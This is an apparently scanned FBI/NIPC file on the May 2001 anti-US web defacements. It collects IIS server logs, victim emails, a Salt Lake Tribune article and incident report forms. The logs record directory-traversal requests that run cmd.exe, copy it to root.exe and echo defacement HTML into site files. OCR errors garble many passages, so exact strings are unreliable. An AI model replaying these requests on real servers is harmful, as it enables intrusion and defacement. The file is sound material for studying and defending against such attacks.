“>fuck+USA+Government’</font’*>“<tr’>“<td’><ptalign%3D%22center%224>"<font+size 
%3D7+color%3Dred*>fuck+P oizonBOx’<tr’>“<td“>"<p+align%3D%22center%22"><fontts 
ize%3D4+color%3Dred’>contact:sysadmcen@yahoo.com.cn’</html’>>../wwwroot/_themes/def 
ault.asp 502 - 

2001-05-06 10:46:07 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot*<html/>“<body+bgcolor%3 Dblack’*>“<br’>*<br*>“<br’>*<br*><br*>"<br’**<ta 
ble+width%3D100%>“<td’><ptalign%3D%22center%22’>"<font+size%3D7+color%3 Dred 
“>fuck+USA+Government*</font*>“<tr’>“<td’><ptalign%3D%22center%224>"<font+size 
%3D7+color%3Dred*>fick+P oizonBOx’<tr’>“<td’>*<ptalign%3 D/%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmen@yahoo.com.cn*</html’>>../wwwroot/_themes/def 
ault.htm 502 - 

2001-05-06 10:46:09 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. /winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:46:11 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot“<html/>“<body+bgcolor%3 Dblack*><br’*>“<br’>“<br’>“<br’>“*<br’*>"<br’>*<ta 
ble+width%3D100%*>*<td*>"<p+align%3D%22center%22’><fonttsize%3D7+color%3 Dred 
“>fuck+USA+Government*</font’>“<tr>*<td’>"<p+align%3D%22center%22"><font+size 
%3D7+color%3Dred’>fuck+P oizonBOx"<tr’>“<td’>"<ptalign%3D%22center%22“>“<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn</html>>../wwwroot/_vti_log/ind 
ex.asp 502 - 

2001-05-06 10:46:11 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-bgcolor?o3Dblack^»^«br^»^«br^»^«br^7^«br^»^«br^»^«br^7^-ta 
ble--width?63D10096^7^«td^7^«p-talign?63D9622center?622^7^«font-size?63D7--color?63Dred 
^»fück "USA: Government^«/font^^^«tr^»^«td^^^«p-ralign?63D9622center?e22^7^-fonttsize 
%3D7+color%3Dred’*>fuck+P oizonBOx’<tr’>“<td’>"<ptalign/%3D%22center%22”>“<fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html”>>../wwwroot/_vti_log/ind 
ex.htm 502 - 

2001-05-06 10:46:12 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-bgcolor?63Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^7^«br^7^«ta 
blet+width%3D100%><td’>*<ptalign%3D%22center%22’><font+size%3D7+color%3Dred 
“>fuck+USA+Government</font’>“<tr’>“<td’>*<p+align”%3D%22center%22">*<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>“<td4>*<ptalign%3 D%22center%22’><fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn”*</html>>../wwwroot/_vti_log/def 


l e 


ault.asp 502 - 
2001-05-06 10:46:12 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^7^«body-tbgcolor?63 Dblack^»^«br^»^«br^»^«br^^«br^»^«br^2^«br^7^«ta 
bletwidth?63D10096^—^«td^7^«p-align?03D9422center9022^7^«fonttsize?03D 74-color?63 Dred 
“>fuck+USA+Government’</font*>“<tr’>“<td’>"<p+talign%3D%022center%22/><font+size 
%3D7+color%3Dred’>fuck+PoizonBOx”<tr*>"<td’>"<ptalign%3D%22center%22’><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’*</html“>>../wwwroot/_vti_log/def 
ault.htm 502 - 

2001-05-06 10:46:17 128.84.234.79 - 24.9.173.59 80 GET /Default htm - 200 - 


‘Other Pertinent Information: 
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HHcube Software Technologies, L.L.C. 
4822 South Nancy Drive 
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computer hacking 
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lof2 


Subject: computer hacking 
Date; Wed, 9 Mà 


b7C 


Hello, 

Just the other day, I put my web sight online using windows 2000 
pro, and got hacked. Here is what I can deduce happened. I was running 
with all critical updates before March 15, 2001. 


In my log file, the following was found 


#Software: Microsoft Internet Information Services 5.0 

#Version: 1.0 

#Date: 2001-05-07 22:35:09 i 

#Fields: time c-ip cs-method cs-uri-stem sc-status Ur 
22:35:09 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe 
22:35:11 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe 
22:35:13 210.28.192.2 GET /scripts/root.exe 502 

22:35:14 210.28.192.2 GET /scripts/root.exe 502 

22:35:16 210.28.192.2 GET /scripts/root.exe 502, 

22:35:17 210.28.192.2 GET /scripts/root.exe 502 

22:35:19 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe 
22:35:21 210.28.192.2 GET /scripts/root.exe 502 

22:35:23 210.28.192.2 GET /scripts/root.exe 502 

22:35:28 210.28.192.2 GET /scripts/root.exe 502 

22:35:30 210.28.192.2 GET /scripts/root.exe 502 

22:35:31 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe 
22:35:33 210.28.192.2 GET /scripts/root.exe 502 

22:35:34 210.28.192.2 GET /scripts/root.exe 502 

22:35:34 210.28.192.2 GET /scripts/root.exe 502 

22:35:37 210.28.192.2 GET /scripts/root.exe 502 

22:35:38 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe 
22:35:40 210.28.192.2 GET /scripts/root.exe 502 

22:35:41 210.28.192.2 GET /scripts/root.exe 502 

22:35:43 210.28.192.2 GET /scripts/root.exe 502 

22:35:44 210.28.192.2 GET /scripts/root.exe 502 

22:35:46 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe 
22:35:47 210.28.192.2 GET /scripts/root.exe 502 t 
22:35:49 210.28.192.2 GET /scripts/root.exe 502 E 
22:35:50 210.28.192.2 GET /scripts/root.exe 502 

22:35:50 210.28.192.2 GET /scripts/root.exe 502 

22:35:52 210.28.192.2 GET /scripts/../../winnt/system32/cmd.exe 
22:35:54 210.28.192.2 GET /scripts/root.exe 502 

22:35:56 210.28.192.2 GET /scripts/root.exe 502 


502 


502 


502 


502 


22:35:57 
22:35:59 
22:36:01 
22:36:03 
22:36:05 
22:36:07 
22:36:08 
22:36:10 
22:36:11 
22:36:13 
22:36:17 
22:36:19 
22:36:20 


` 22:36:21 


22:36:23 
22:36:25 
22:36:27 


210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 
210.28.192.2 


/scripts/root.exe 502 
/scripts/root.exe 502 


/scripts/../../winnt/system32/cmd.exe 


/scripts/root.exe 502 
/scripts/root.exe 502 
/scripts/root.exe 502 
/scripts/root.exe 502 


/scripts/../../winnt/system32/cmd.exe 


/scripts/root.exe 502 
/scripts/root.exe 502 
/scripts/root.exe 502 
/scripts/root.exe 502 


/scripts/../../winnt/system32/cmd.exe 


/scripts/root.exe 502 
/scripts/root.exe 502 
/scripts/root.exe 502 
/scripts/root.exe 502 


502 


502 


502 


5/10/01 8:55 AM 
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' 22:36:29 210.28.192.2 GET /scripts/../. -/winnt/system32/cmd. exe 502 


22:36:31 210.28.192.2 GET /sctipts/root.exe 502 


After this, I found a bunch of index.asp, default.asp, index.htm .. files 
left on my system, speaking unflatteringly of the USA 


The condense of those message was the following html 


'"«html»«body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p 
align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p 
align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p 
align="center"><font size-4 color-red»contact:sysadmcneyahoo.com.cn«/htmi- 


I'm sure this information may be useful to someone over there. I have I 
question. Do you know of a place I can go for information on how to prevent 
this in the future? 


Thanks 


b6 
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5/10/01 8:55 AM 


From: IPC-WATCH 
To: ! b6 
Date: ed, May 9, : b7C 


Subject: Utah Web Defacement 


Please see attached article regarding Utah Government Website Defacement by CHINA. 
NIPC Watch 


Subject: Computer Hackers' Assault Puts Utah Officials on Alert; Utah 
Offi cials Alarmed by Web Attack 
Date: Wed, 9 May 2001 16:53:22 -0400 


Fr b6 
To b7¢ 
b7E 


The Salt Lake Tribune, May 8, 2001 
Copyright 2001 The Salt Lake Tribune 
The Salt Lake Tribune 

May 8, 2001, Tuesday : 

SECTION: Final; Pg. A1 

LENGTH: 736 words 


HEADLINE: Gomputer Hackers' Assault Puts Utah Officials on Alert; Utah 
Officials Alarmed by Web Attack 


BYLINE: BY GREG BURTON, THE SALT LAKE TRIBUNE 
BODY: 
COPYRIGHT 2001 THE SALT LAKE TRIBUNE 


Computer hackers attacked Utah over the weekend, injecting a virus that 
defaced a handful of Web sites including pages operated by the state of 


Utah, a defense subcontractor and The Salt Lake Tribune. 


The intrusion was discovered early Monday on a demographics page for Utah 
Gov. Mike Leavitt's budget office, which had been replaced with the phrases 
"f--- USA Government" and "f--- PoizonBOx." A staff- access page at The 
Tribune was replaced at 10:28 a.m. with the same message. 


Utah Informational Technology Services Director Leon Miller said breaches to 
the state system were first clocked around 6 a.m. and that for most of the 
morning the state's "intrusion alarm was going crazy." 


While Utah officials first detected someone attempting to hack into their 
system with a "PoizonBOx" virus in late April, Miller said the attempts were 
not successful and he chose not to report the incidents. Monday's assault 
was too widespread to ignore. 


"As far as we know there's no permanent damage," he said. "But they are 
trying to scan passwords to find if they can find some to steal." 


Sverdrup Technology, a Tennessee contractor with offices at Hill Air Force 
Base, also was hit Monday by a hacker who accessed internal-use pages, said 
Frank Bria, president of the Utah Web development company NextQuo. 


"These were really hidden links, way deep down, and | suspect there are a 
lot more out there that people don't know about," Bria said. "These weren't 
just home pages -- so they had to really bore down." 


Hill spokesman U.S. Air Force Maj. Sam Hudspath said hackers hadn't tried to 
penetrate the military's system but that computer security officers were 
aware of the threat and were taking appropriate precautions. 


While Monday's break-in was significant, Miller was equally alarmed by the 
growing number of failed hacking attempts on Utah's system since April 27. 
Despite constant monitoring since then, hackers broke through. 


"Anyone who says they can't be hacked is a fool, but we have a lot of 
safeguards in place," he said. 


"The point is this thing spread and we're suddenly finding it everywhere." 


Hackers using the phrase "PoizonBOx" previously struck sites in Australia, 
China, Ecuador, Egypt, Trinidad, Turkey, the United Kingdom, Ukraine and ` 
elsewhere in the United States. 


Late last month a group of Chinese hackers threatened a "May Day War" 
against sites in this country because they claimed PoizonBOx originated in 

the United States. "We are obligated to strike back with utmost force after 

such provocation by American hackers," a group of Chinese hackers was quoted 
as sayíng in a May 1 Reuters news report. 


While anti-PoizonBOx forces appeared to be behind Monday's attack in Utah, 
digital fingerprints left by the hackers could be designed to mislead. One 
obvious clue was an e-mail address made to look as if it came from China. 


Because Monday's virus infected at least two different platforms, Nextel and 
Microsoft, Bria said a sophisticated intruder was involved. 


And while the virus did not appear to be malicious and no permanent damage 
was reported, the scope of the attack won't.be known for days, he said. 
"They could have planted some worm behind the fire wall." 


Computer experts in Utah were following one lead that suggested the hacking 
originated in Rio De Janeiro, Brazil, Miller said. Bria and other experts, 
however, suspect the attacks are linked to the digital dogfight between 

China and the United States. 


Since the April 1 midair collision between an American spy plane and a 
Chinese fighter jet, the.computer warfare has spread. 


According to the FBI's National Infrastructure Protection Center (NIPC), 
hacking activity against the United States was supposed to increase until 


Monday, the anniversary of the accidental bombing by the United States of 


the Chinese Embassy in Belgrade, Yugoslavia. 

Calling the intruders "malicious hackers," federal officials said several 

U.S. sites already have been unlawfully defaced, "replacing existing content 
with pro-Chinese or anti-U.S. rhetoric." 


Another virus stalking the Internet, called "Lion," was traced back to a 
Chinese e-mail address, NIPC reported. 


Utah officials planned to work through Monday evening checking their system. 


"We want to find what the vulnerability was so this doesn't happen again," 
Miller said. 


gburton@sltrib.com <mailto:gburton@sltrib.com> 
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From: - 


To: 
Date: Thu, May 10, 2001 7:08 PM 
Subject: China Intrusion 


Subject: Cyber Incident Report Form 


Date: Thu, 10 May 2001 12:19:53 -0600 
To: «nipc.watc L.gov? 

Repo ime=5/10/01- 12:00P.M. 
Name 

Title 


Telep 

Email 

Organization=P5 e.Heaith Services 

Addrs Streetz2455 E. Parleys Way Suite #300 
City-Salt Lake City 

State=Utah 

Zip Code=84109 

Country=USA 

Question1 OrganizationzP5 e.Health Services 
Question1 Contact Info 
Question1 Tele Number 

Question Street-SAME 
Question1 City State Zipcd- 

Question1 Country- : 

Question1 Email- 

Question2_Location=All 3 of our IIS5.0 Web Servers 
Question3 Date Time-5/7/01- 2:00P.M. 
Questíon4 Critical-Yes 
Questionb5 crit infrasture-Other 

Questionb Remarks-Medica! Health Claims 
Question6 nature of probzWeb site defacement 
QuestionG other- 

Question7 exp problem-No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Unknown 
Question8_Remarks=No Remarks 
Question9_sus_perpetrators=Unknown 
Question9_Remarks=No Remarks 

Question10 ip addrs-Don't know 

Question11 evid of spoof-Unknown 
Question12, oper systemszNT 

Question12 RemarkszllS 5.0 
Question13 security infrasture-Encryption 
Question13 security infrasture-Firewall 
Question13 security infrasture2Access Control Lists 
Question14 attack [oss info-No 

Question14 Remarks-No Remarks 

Question15 damage systms-Yes 

Question15 Remarks- 
Question16 what actions-Backup of affected system(s) 
Question16_Remarks=No Remarks 


b6 
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Yesysroot%\c:\inetpub\scrips folder contains all of the hackers defacing 
code. Atleast ! hope that is it. 

Question17_fieldoff_inform=Yes 

Question17. Field Office=There's been an outbreak here 

Question18 agency, inform-No 

Question18 State local Police= 

Question18 Inspector General= 

Question18 CERT-CC- 

Question18 FedCIRCz 

Question18 JTF-CND- 

Question18 Otherz 

Question19 date of last update-1 month ago 

Question19 org work update-ME 

Question20 POC Informationz 

Question20 sys adm contract-No 

Share Info With=Public 

Share Info With=Infrastructure Orgs 

Question21 remarks-This is what was contained on our web site, by the 
hacker: 


fuck USA Government 
fuck PoizonBOx 


contact:sysadmcn@yahoo.com.cn 


From: NIPC-WATCH 


To: 
Date: Sun, May 6, 2001 11:13 PM 
Subject: Incident Report 


and SS 


The Watch received the following incident report i, I city Unified School District b6 
1604 main Street, Miles ct Montana 59301. The e incident reportto SSA[ — ] b7c 


Salt Lake City FO. Serial number 050601-006-41381. 


NIPC Watch 


ect: Cyber Incident Report Tom 


Date: i 
From 
To: «nipc.watc Lgov» 


Name 


Telephone Fax | umberd ^ |] 
Ema[ | 
Organization-Miles City Unified Schoo! District 
Addrs Street21604 Main St. 

City=Miles City 

State=Montana 

Zip Code=59301 

‘Country=USA 
Question1_Organization=SAME 

Question1 Contact Info- 
Question1 Tele Number- 

Question1 Street-SAME 
Questioni City State Zipcd- 

Question1 Country- 

Question1 Email- 

Question2 Location-Telco Closet 

Custer County District High School 

20 S. Center Ave. 

Miles City, MT 59301 

(406) 232-4920 

Question3 Date Time-May 6, 2001 6: jebi 
Question4_Critical=No 
Question5_Remarks=No Remarks 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=Web site defacement 
Question6_other= 
Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_method_of_attack=Other 
Question8_Remarks=No REMARK 


ow ES be 


b6 
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slic uo buco 


6.18 py: 
oC Pq 7:20 
ae QQ fee wel 


41 8S» 


a eP x 


SEARCHED a INDEXED __. 
| SERIALIZED „omm FILED ne 


MAY 15. 2001 


SALT LAKE CIT 


FBI- b6 


b7C 


Question9 sus perpetrators-Other 


Question9 Remarks-Chinese threatened hack. 
Question10_ip_addrs=Can be supplied upon request. Not yet known. 


- Question11 evid of spoof-Unknown 
Question12 oper systems-NT 
Question12 RemarkszllS 4.0 
Question13 security infrasture-Firewall 
Question14 attack loss, info-No 
Question14_Remarks=No Remarks 
Question15 damage. systmszNo 
Question15 Remarks=No Remarks 
Questioni6_Remarks=No Remarks 
Question17. Field Office= 
Question17 fieldoff inform-No 
Question18 agency inform-No 
Question18 State local Police= _ 
Question18 Inspector General= 
Question18 CERT-CCz 
Question18_FedCIRC= 
Question18 JTF-CND- 

Question18 Other- 

Question19 date of last update- 
Questioní9 org work update- 
Question20 POC Information= 
Question20 sys adm contract-No 


Question21_remarks=No additional remarks 
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NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: L] Negative [J See below 


Character of case 


Er 


Subject's name and aliases 


FNU LNU 


LJ Personal 


Address of Subject 
UNK 


Subject’s 
Fi 


[X| Telephonic Date 05/03/01 Time 12:15 arn 
Complainant's address and telephone number 
Complainant's DOB Sex 
02/02/58 Male 
Employer Address Telephone 
Rolls Royce in Park City, Utah, 6125 Silver Creek Drive has a 
website at rolls-roycegs.com. On 02/02/01 a message defacing the website 
"contact :sysadmen@yahoo.com.cn". The message was in red and black. 
Complainant stated that the message was noticed only minutes after it was 


Complaint received 
6125 Silver Creek Drive 
Park Cit UT 84068 
ERN cA RM ttn 
Facts of Complaint 
was hacked in. The message stated in large letters, "FUCK USA 
GOVERNMENT, FUCK POISON BOX" and in small letters underneath was 
received. The website is administrated by Qwest with their standard 
firewalls. 


Do not write in this space. 


BLOCK STAMP 
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